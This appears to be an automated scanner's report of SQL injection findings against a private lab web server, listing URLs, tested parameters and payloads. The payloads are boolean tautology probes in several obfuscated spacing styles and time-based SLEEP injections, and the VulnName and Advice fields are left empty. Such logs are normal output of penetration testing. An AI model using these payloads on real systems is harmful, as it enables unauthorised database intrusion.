Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	8585=8585
	and	46794=46794
	or	51142=51142#
	and	48499=48500
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'27609'='27609
'/**/and/**/'86254'='86254
'/**/or/**/66917=66917#
'/**/and/**/'59045'='59046
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	8585=8585
	and	46794=46794
	or	51142=51142#
	and	48499=48500
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	8585=8585
	and	46794=46794
	or	51142=51142#
	and	48499=48500
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
3845=3845

and
84251=84251

or
54711=54711#

and
624=625
Advice: 
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: 
Query: {'name': 'hacker'}
Payload: '+and+'65314'='65314
'+and+'5325'='5325
'+or+13456=13456#
'+and+'31735'='31736
Advice: 
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'99568'='99568
'	and	'93662'='93662
'	or	60241=60241#
'	and	'31512'='31513
Advice: 
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: 
---